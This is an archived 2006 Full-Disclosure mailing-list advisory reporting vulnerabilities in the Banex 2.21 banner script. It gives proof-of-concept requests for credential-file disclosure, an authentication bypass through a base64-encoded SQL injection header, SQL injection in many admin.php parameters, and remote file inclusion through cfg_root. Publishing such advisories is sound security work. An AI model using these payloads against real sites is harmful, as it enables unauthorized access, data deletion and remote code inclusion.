[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Banex Multiple Vulnerabilities
From: SirDarckCat <sirdarckcat () gmail ! com>
Date: 2006-07-30 4:42:36
Message-ID: 8ba534860607292142v59450c31l430d65424ca3967b () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
Discovered by Sirdarckcat from elhacker.net
Banex 2.21
http://sourceforge.net/projects/banex
==============================================
Banex is a simple script for sharing Banners
through multiple webs.
Anyway it has multiple vulnerabilities.
==============================================
1.- Sensitive Information Disclosure
PoC:
http://www.server.com/inc/lib.inc
No protection, and contains the DB name password and user.
==============================================
2.- SQL injection
PoC:
GET /admin.php HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=
==============================================
3.- SQL injection
PoC:
http://www.server.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/
*
==============================================
4.- SQL injection **** AUN CON MAGIC ON ****
PoC:
GET /admin.php?activatebanner&id=-1%20[SQLi] HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=
Same bug in context SELECT:
/admin.php?activateuser&id='+[SQL]
/admin.php?deleteunuser&id='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?viewmem&viewmem='+[SQL]
/admin.php?viewmemunb&viewmemunb='+[SQL]
/admin.php?viewunmem&viewunmem='+[SQL]
Same bug, in context DELETE:
/admin.php?deletebanner&id=-1+[SQL]
/admin.php?activateuser&deleteuser='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
==============================================
5.- Remote File Inclusion:
PoC:
http://www.server.com/members.php?cfg_root=http://www.google.com/?
==============================================
Att.
Sirdarckcat
elhacker.net
--
Att.
SirDarckCat@GMail.com
http://www.google.com/search?q=sirdarckcat
[Attachment #5 (text/html)]
<p>Discovered by Sirdarckcat from <a href="http://elhacker.net">elhacker.net</a></p>
<p>Banex 2.21<br><a href="http://sourceforge.net/projects/banex">http://sourceforge.net/projects/banex</a><br>==============================================</p>
<p>Banex is a simple script for sharing Banners<br>through multiple webs.</p>
<p>Anyway it has multiple vulnerabilities.</p>
<p>==============================================<br>1.- Sensitive Information Disclosure</p>
<p>PoC:<br><a href="http://www.server.com/inc/lib.inc">http://www.server.com/inc/lib.inc</a></p>
<p>No protection, and contains the DB name password and user.</p>
<p>==============================================</p>
<p>2.- SQL injection</p>
<p><br>PoC:</p>
<p>GET /admin.php HTTP/1.1<br>Host: <a \
href="http://www.server.com/">www.server.com</a><br>Authentication: Basic: \
YWRtaW4nIE9SIDE9MS8qOnA=</p> <p>==============================================</p>
<p>3.- SQL injection</p>
<p>PoC:<br><a href="http://www.server.com/signup.php?signup=1&user_pw=2&passwordconfirm= \
2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/">http://www.server \
.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/
</a>*</p>
<p>==============================================</p>
<p>4.- SQL injection **** AUN CON MAGIC ON ****</p>
<p>PoC:<br>GET /admin.php?activatebanner&id=-1%20[SQLi] HTTP/1.1<br>Host: <a \
href="http://www.server.com/">www.server.com</a><br>Authentication: Basic: \
YWRtaW4nIE9SIDE9MS8qOnA=</p> <p><br>Same bug in context \
SELECT:<br>/admin.php?activateuser&id='+[SQL]<br>/admin.php?deleteunuser&id='+[SQL]<br>/ \
admin.php?deleteuserbanner&deleteuserbanner='+[SQL]<br>/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
<br>/admin.php?viewmem&viewmem='+[SQL]<br>/admin.php?viewmemunb&viewmemunb='+[SQL]<br>/admin.php?viewunmem&viewunmem='+[SQL]</p>
<p>Same bug, in context \
DELETE:<br>/admin.php?deletebanner&id=-1+[SQL]<br>/admin.php?activateuser&deleteuser='+[SQL]<br>/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]</p>
<p>==============================================</p>
<p>5.- Remote File Inclusion:</p>
<p>PoC:<br><a href="http://www.server.com/members.php?cfg_root=http://www.google.com/">http://www.server.com/members.php?cfg_root=http://www.google.com/</a>?</p>
<p><br>==============================================</p>
<p>Att.<br>Sirdarckcat<br><a href="http://elhacker.net">elhacker.net</a></p><br \
clear="all"><br>-- <br>Att.<br><a \
href="mailto:SirDarckCat@GMail.com">SirDarckCat@GMail.com</a><br><br><a \
href="http://www.google.com/search?q=sirdarckcat"> \
http://www.google.com/search?q=sirdarckcat</a>
["banex.txt" (text/plain)]
Discovered by Sirdarckcat from elhacker.net
Banex 2.21
http://sourceforge.net/projects/banex
==============================================
Banex is a simple script for sharing Banners
through multiple webs.
Anyway it has multiple vulnerabilities.
==============================================
1.- Sensitive Information Disclosure
PoC:
http://www.server.com/inc/lib.inc
No protection, and contains the DB name password and user.
==============================================
2.- SQL injection
PoC:
GET /admin.php HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=
==============================================
3.- SQL injection
PoC:
http://www.server.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/*
==============================================
4.- SQL injection **** AUN CON MAGIC ON ****
PoC:
GET /admin.php?activatebanner&id=-1%20[SQLi] HTTP/1.1
Host: www.server.com
Authentication: Basic: YWRtaW4nIE9SIDE9MS8qOnA=
Same bug in context SELECT:
/admin.php?activateuser&id='+[SQL]
/admin.php?deleteunuser&id='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
/admin.php?viewmem&viewmem='+[SQL]
/admin.php?viewmemunb&viewmemunb='+[SQL]
/admin.php?viewunmem&viewunmem='+[SQL]
Same bug, in context DELETE:
/admin.php?deletebanner&id=-1+[SQL]
/admin.php?activateuser&deleteuser='+[SQL]
/admin.php?deleteuserbanner&deleteuserbanner='+[SQL]
==============================================
5.- Remote File Inclusion:
PoC:
http://www.server.com/members.php?cfg_root=http://www.google.com/?
==============================================
Att.
Sirdarckcat
elhacker.net
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic